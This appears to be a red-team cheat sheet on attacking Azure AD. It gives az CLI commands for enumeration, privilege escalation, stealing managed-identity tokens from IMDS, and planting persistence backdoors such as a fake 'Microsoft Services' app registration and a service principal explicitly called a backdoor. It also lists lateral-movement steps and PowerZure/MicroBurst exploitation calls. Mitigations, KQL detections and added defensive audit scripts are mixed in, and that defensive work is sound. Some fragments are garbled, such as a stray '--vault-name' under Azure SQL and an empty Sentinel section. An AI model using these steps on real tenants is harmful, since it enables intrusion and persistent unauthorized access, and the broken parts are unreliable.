☁️ Azure AD Attack Techniques
🧠 Description
Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. Attacks against Azure AD target authentication mechanisms, service principals, managed identities, and application permissions to gain unauthorized access and persist in the cloud environment.
- Single Sign-On: Compromising Azure AD grants access to many apps
- Service Principals: Often have excessive permissions
- Managed Identities: Can be abused for privilege escalation
- Legacy Integrations: Sync from on-prem AD exposes hybrid flaws
- Application OAuth: Malicious app registrations for persistence
🔍 Azure AD Enumeration
Azure CLI Setup:
# Install Azure CLI
curl -sL https://aka.ms/install-azure-cli | bash
# Login
az login
# Show current tenant info
az ad signed-in-user show
az account tenant list
# List subscriptions
az account list --all
User Enumeration:
# List all users
az ad user list --query '[].{displayName:displayName,mail:mail,userType:userType}' -o table
# Get specific user
az ad user show --id user@company.com
# List groups
az ad group list --query '[].{displayName:displayName,description:description}' -o table
# List group members (the flag is --group, which accepts an object id or display name)
az ad group member list --group <group-id-or-name>
# List service principals
az ad sp list --query '[].{displayName:displayName,appId:appId}' -o table
Application Enumeration:
# List enterprise applications
az ad app list --query '[].{displayName:displayName,appId:appId}' -o table
# Get app permissions
az ad app permission list --id <app-id>
# List delegated permissions (this property was oauth2Permissions in the legacy AAD Graph based CLI)
az ad app show --id <app-id> --query 'api.oauth2PermissionScopes'
# Check app roles
az role assignment list --assignee <app-id>
Role Assignments:
# List role assignments
az role assignment list --all --output table
# List built-in roles
az role definition list --query '[].{name:name,description:description}' -o table
# Get permissions for a role
az role definition list --name "Contributor"
# Scope: subscription, resource group, or resource
🔓 Privilege Escalation
Technique 1: Service Principal Key Creation:
# Check if you can create credentials on service principals
az ad sp credential list --id <sp-id-or-app-id>
# Add a password credential to the service principal (--append keeps the existing ones)
az ad sp credential reset --id <sp-id-or-app-id> --append
# If you have app permission, remove a credential
az ad sp credential delete --id <sp-id-or-app-id> --key-id <key-id>
Technique 2: Add Owner to Application:
# Check if you can add owners
# (Azure RBAC has no /applications/ scope, so this call is rejected; app ownership
# is a directory property and is set with the az ad command below)
az role assignment create \
--role "Owner" \
--assignee <object-id> \
--scope /applications/<app-id>
# Add yourself as owner to app
az ad app owner add --id <app-id> --owner-object-id <your-object-id>
Technique 3: Assign Application Admin Role:
# List available role assignments
az role assignment list --scope /providers/Microsoft.MachineLearningServices
# Grant application admin
# Caveat: "Application Administrator" and "Global Administrator" are Microsoft Entra directory
# roles, not Azure RBAC roles. az role assignment create only handles Azure RBAC, so these
# calls fail; directory role membership changes are logged in AuditLogs as "Add member to role".
az role assignment create \
--role "Application Admin" \
--assignee <object-id> \
--scope /tenant
# Or global admin
az role assignment create \
--role "Global Admin" \
--assignee <object-id> \
--scope /tenant
Technique 4: Exploit Logic App Managed Identity:
# Check for Logic Apps with system-assigned identity
az logic workflow show --resource-group MyResourceGroup --name MyWorkflow --query identity
# If Logic App has contributor role on RG, escalate
az resource update --ids /subscriptions/xxx/resourceGroups/RG/providers/Microsoft.Logic/workflows/LogicApp
# Get token via managed identity (IMDS is a GET and requires api-version; see the next section)
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' \
-H "Metadata: true"
🔑 Managed Identity Exploitation
Azure Instance Metadata Service (IMDS):
# Get access token from VM with managed identity
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' \
-H "Metadata: true"
# Or for specific resource
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net/' \
-H "Metadata: true"
From Azure Functions/Lambda Equivalent:
# App Service and Functions do not use IMDS: the platform injects IDENTITY_ENDPOINT and
# IDENTITY_HEADER, and the token request sends that header value (there is no PUT step
# as on AWS IMDSv2)
curl "$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://management.azure.com/" \
-H "X-IDENTITY-HEADER: $IDENTITY_HEADER"
Privilege Escalation via VM Managed Identity:
# If VM has "Contributor" on subscription
# You can execute code on VM (via RCE or existing access)
# Then extract managed identity token and call Azure API
# Use Azure management API to:
# 1. Create new user
# 2. Add yourself to Global Admin
# 3. Create new service principal
# 4. Assign roles to yourself
# Note: steps 1-3 are directory (Microsoft Graph) operations; Azure RBAC Contributor on a
# subscription does not grant them, so a Contributor identity alone stops at step 4's scope
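The risk in this section comes from non-human identities (VM and Logic App managed identities, service principals) holding Contributor, Owner or User Access Administrator on a whole subscription. The check below is an added example, not code from the original page: it takes the JSON shape of `az role assignment list --all -o json` (a constructed sample is embedded) and reports those assignments for review.

```python
import json
import re

# Constructed sample in the shape of `az role assignment list --all -o json`
# (only the fields this check uses; real output carries many more).
SAMPLE_ASSIGNMENTS = json.loads("""[
 {"principalName": "vm-web-01", "principalType": "ServicePrincipal",
  "roleDefinitionName": "Contributor",
  "scope": "/subscriptions/00000000-0000-0000-0000-000000000000"},
 {"principalName": "logicapp-billing", "principalType": "ServicePrincipal",
  "roleDefinitionName": "Reader",
  "scope": "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/billing-rg"},
 {"principalName": "svc-deploy", "principalType": "ServicePrincipal",
  "roleDefinitionName": "User Access Administrator",
  "scope": "/providers/Microsoft.Management/managementGroups/corp"},
 {"principalName": "alice@example.com", "principalType": "User",
  "roleDefinitionName": "Owner",
  "scope": "/subscriptions/00000000-0000-0000-0000-000000000000"}
]""")

# Roles that let an identity change resources or grant itself more rights.
HIGH_IMPACT_ROLES = {"Owner", "Contributor", "User Access Administrator"}
SUBSCRIPTION_SCOPE = re.compile(r"^/subscriptions/[0-9a-f-]{36}$", re.IGNORECASE)
MGMT_GROUP_SCOPE = re.compile(r"^/providers/Microsoft\.Management/managementGroups/[^/]+$")

def is_broad_scope(scope: str) -> bool:
    """True for a whole subscription or management group (not an RG or a single resource)."""
    return bool(SUBSCRIPTION_SCOPE.match(scope) or MGMT_GROUP_SCOPE.match(scope))

def find_risky_assignments(assignments):
    """Return (principal, role, scope) for every non-human identity (managed
    identities are listed as ServicePrincipal) that holds a high-impact role
    at subscription or management-group scope."""
    findings = []
    for a in assignments:
        if a.get("principalType") != "ServicePrincipal":
            continue  # human accounts are reviewed through PIM/MFA policy instead
        if a.get("roleDefinitionName") not in HIGH_IMPACT_ROLES:
            continue
        if is_broad_scope(a.get("scope", "")):
            findings.append((a["principalName"], a["roleDefinitionName"], a["scope"]))
    return findings

if __name__ == "__main__":
    for principal, role, scope in find_risky_assignments(SAMPLE_ASSIGNMENTS):
        print(f"REVIEW: {principal} holds {role} at {scope}")
```

Run it against the real CLI output (`az role assignment list --all -o json > assignments.json`) and feed the parsed list to `find_risky_assignments`; each hit is a candidate for scoping the role down to a resource group or swapping it for a narrower built-in role.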
🎯 Persistence Mechanisms
1. Malicious Application Registration:
# Register an application
az ad app create \
--display-name "Microsoft Services" \
--password "SuperSecret123!" \
--required-resource-access '[
{"resourceAppId":"00000003-0000-0000-c000-000000000000","resourceAccess":[
{"id":"e1fe6f66-5d27-4d38-976d-xxxxxxxxxxxx","type":"Role"}
]}
]'
# Add credential (stays even after password reset)
az ad sp credential reset --id <app-id> --append
# Grant admin consent
az ad app permission admin-consent --id <app-id>
2. Service Principal Backdoor:
# Create service principal with high permissions
az ad sp create-for-rbac --role Contributor --scope /subscriptions/<subscription-id>
# Or with more privileges
az ad sp create-for-rbac --role "User Access Administrator" --scope /subscriptions/<subscription-id>
# Save the output - this is your backdoor
# {
#   "appId": "...",
#   "password": "...",
#   "tenant": "..."
# }
3. Add Backdoor to Existing App:
# Add an extra credential to the existing app
az ad sp credential reset --id <app-id> --append
# Or add owner to app
az ad app owner add --id <app-id> --owner-object-id <object-id>
4. Role Assignment on Subscription:
az role assignment create \
--role <role> \
--assignee <object-id> \
--scope /subscriptions/<subscription-id>
# Use for persistent access
🚀 Lateral Movement
Accessing Resources:
# Read a Key Vault secret
az keyvault secret show --name <secret-name> --vault-name <vault-name>
# List VMs
az vm list --query '[].name' -o table
# List web apps
az webapp list --query '[].name' -o table
Access Azure SQL:
--vault-name
Container Registry Access:
# List images
az acr repository list --name <registry-name>
# Pull image
docker pull <registry-name>.azurecr.io/image:tag
🛡️ Mitigation
- Conditional Access: Require MFA for all admin access
- Privileged Identity Management: Use just-in-time access
- Disable IMDS: For VMs that don't need it
- Audit Service Principals: Remove unused credentials
- App Registration Restrictions: Limit who can create apps
- Monitor Role Assignments: Alert on Global Admin changes
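Two of these mitigations (auditing service principal credentials and restricting app registrations) can be turned into a routine check over `az ad app list -o json`. The script below is an added example, not code from the original page; it embeds a constructed sample in that JSON shape and flags expired credentials, lifetimes beyond policy, and display names that imitate Microsoft, the naming trick used by the malicious registration in the persistence section.

```python
import json
from datetime import datetime, timezone

# Constructed sample in the shape of `az ad app list -o json` (fields used here only).
SAMPLE_APPS = json.loads("""[
 {"displayName": "payroll-connector", "appId": "11111111-1111-1111-1111-111111111111",
  "passwordCredentials": [
   {"keyId": "k1", "startDateTime": "2023-01-01T00:00:00Z", "endDateTime": "2025-01-01T00:00:00Z"},
   {"keyId": "k2", "startDateTime": "2024-05-01T00:00:00Z", "endDateTime": "2024-11-01T00:00:00Z"}],
  "keyCredentials": []},
 {"displayName": "Microsoft Services", "appId": "22222222-2222-2222-2222-222222222222",
  "passwordCredentials": [
   {"keyId": "k3", "startDateTime": "2024-06-01T00:00:00Z", "endDateTime": "2124-06-01T00:00:00Z"}],
  "keyCredentials": []}
]""")

def parse_ts(value: str) -> datetime:
    """Graph timestamps are UTC ISO-8601 with a trailing Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def audit_app_credentials(apps, now: datetime, max_lifetime_days: int = 365):
    """Return (app, item, reason) findings: expired secrets/certs that were never
    cleaned up, credential lifetimes beyond policy, and display names that
    imitate Microsoft (verify the publisher before trusting such an app)."""
    findings = []
    for app in apps:
        name = app["displayName"]
        if "microsoft" in name.lower():
            findings.append((name, app["appId"], "name imitates Microsoft; confirm publisher"))
        for cred in app.get("passwordCredentials", []) + app.get("keyCredentials", []):
            start, end = parse_ts(cred["startDateTime"]), parse_ts(cred["endDateTime"])
            lifetime = (end - start).days
            if end < now:
                findings.append((name, cred["keyId"], "expired; remove it"))
            elif lifetime > max_lifetime_days:
                findings.append((name, cred["keyId"], f"lifetime {lifetime}d exceeds policy"))
    return findings

if __name__ == "__main__":
    for app, item, reason in audit_app_credentials(SAMPLE_APPS, datetime.now(timezone.utc)):
        print(f"{app} [{item}]: {reason}")
```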
Azure AD Security Center Recommendations:
# Check security recommendations
az security recommendation list --query '[].{name:name,category:category}' -o table
# Enable PIM for admin roles
# Caveat: PIM and the "Privileged Role Administrator" directory role are configured in
# Microsoft Entra (portal or Microsoft Graph), not through Azure RBAC, so this call fails
az role assignment create \
--role "Privileged Role Administrator" \
--assignee-object-id <object-id> \
--scope /tenants/<tenant-id>
# Disable legacy authentication
# There is no az ad command for this: block legacy auth tenant-wide with a Conditional Access
# policy that targets legacy authentication clients (Exchange ActiveSync and "other clients")
🔍 Detection
Azure AD Sign-In Logs:
// Use Log Analytics for Azure AD
// Query unusual sign-ins (ResultType is a string column; "0" is a successful sign-in)
SigninLogs
| where TimeGenerated > ago(1d)
| where ResultType != "0"
| where AppId == "797f4846-0000-0000-0000-000000000000"
| project TimeGenerated, UserPrincipalName, IPAddress, Location, ResultDescription
// Suspicious app registrations (the actor lives in the InitiatedBy dynamic column)
AuditLogs
| where OperationName == "Add application"
| where Result == "success"
| project TimeGenerated, Actor = tostring(InitiatedBy.user.userPrincipalName), TargetResources
// New owner added
AuditLogs
| where OperationName == "Add owner to application"
| project TimeGenerated, Actor = tostring(InitiatedBy.user.userPrincipalName), TargetResources
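The same AuditLogs events can be correlated outside KQL, for example in a SOAR step that receives exported rows. The detector below is an added example, not code from the original page: it runs over constructed rows in the AuditLogs column shape, raises an alert for each watched operation, and escalates to critical when one actor registers an app and then adds a credential, owner or consent to that same app within a short window, which is exactly the persistence sequence shown earlier on this page.

```python
import json
from datetime import datetime, timedelta, timezone

# Constructed rows in the shape of the Entra AuditLogs table (real column names, made-up values).
SAMPLE_AUDIT = json.loads("""[
 {"TimeGenerated": "2024-09-03T08:00:00Z", "OperationName": "Add application", "Result": "success",
  "InitiatedBy": {"user": {"userPrincipalName": "bob@example.com"}},
  "TargetResources": [{"displayName": "Microsoft Services", "type": "Application"}]},
 {"TimeGenerated": "2024-09-03T08:02:00Z", "Result": "success",
  "OperationName": "Update application \u2013 Certificates and secrets management",
  "InitiatedBy": {"user": {"userPrincipalName": "bob@example.com"}},
  "TargetResources": [{"displayName": "Microsoft Services", "type": "Application"}]},
 {"TimeGenerated": "2024-09-03T11:00:00Z", "OperationName": "Add owner to application", "Result": "success",
  "InitiatedBy": {"app": {"displayName": "Deploy Pipeline"}},
  "TargetResources": [{"displayName": "payroll-connector", "type": "Application"}]}
]""")

# The operations the KQL queries above watch, plus credential-add, consent and role-membership events.
WATCHED = {"Add application": "medium", "Add owner to application": "high",
           "Update application \u2013 Certificates and secrets management": "high",
           "Consent to application": "high", "Add member to role": "high"}
FOLLOW_UPS = {op for op, sev in WATCHED.items() if sev == "high"}

def actor_of(row) -> str:
    """InitiatedBy carries either a user or an app; take whichever is present."""
    ib = row.get("InitiatedBy") or {}
    return ((ib.get("user") or {}).get("userPrincipalName")
            or (ib.get("app") or {}).get("displayName") or "unknown")

def target_of(row) -> str:
    return (row.get("TargetResources") or [{}])[0].get("displayName", "?")

def ts(row) -> datetime:
    return datetime.strptime(row["TimeGenerated"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def detect(rows, window: timedelta = timedelta(minutes=30)):
    """Return (severity, actor, operation, target). Every successful watched operation is
    an alert; an actor who registers an app and then adds a credential, owner or consent
    to that same app within `window` is escalated to critical."""
    rows = sorted(rows, key=ts)
    alerts = [(WATCHED[r["OperationName"]], actor_of(r), r["OperationName"], target_of(r))
              for r in rows if r["OperationName"] in WATCHED and r.get("Result") == "success"]
    for reg in (r for r in rows if r["OperationName"] == "Add application"):
        chained = [r for r in rows if r["OperationName"] in FOLLOW_UPS
                   and actor_of(r) == actor_of(reg) and target_of(r) == target_of(reg)
                   and timedelta(0) <= ts(r) - ts(reg) <= window]
        if chained:
            alerts.append(("critical", actor_of(reg), "register-then-credential chain", target_of(reg)))
    return alerts
```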
Azure Sentinel Detection Rules:
🛠️ Tools
- MicroBurst: Azure enumeration and exploitation
- Stormspotter: Azure red team tool
- AzureHound: BloodHound data collector for Azure AD (builds the attack-path graph)
- PowerZure: Azure exploitation framework
PowerZure Examples:
Import-Module PowerZure
Connect-Azure -Account <account>
# Enumerate
Get-AzureTargets
Get-AzureRoles
Get-AzureUsers
Get-AzureResources
# Exploit
Get-AzureVMExecute -ResourceGroup <resource-group> -VMName <vm-name>
Get-AzureVMImmersive -ResourceGroup <resource-group> -VMName <vm-name>
MicroBurst:
# MicroBurst ships as a module manifest, so the import targets the .psm1
Import-Module .\MicroBurst.psm1
# Enumerate
Get-AzurePasswords
Get-AzureAppInfo
Get-AzureUsers
# Blasting
Invoke-AzureEnum -App secret
Get-AzureBlobFiles -base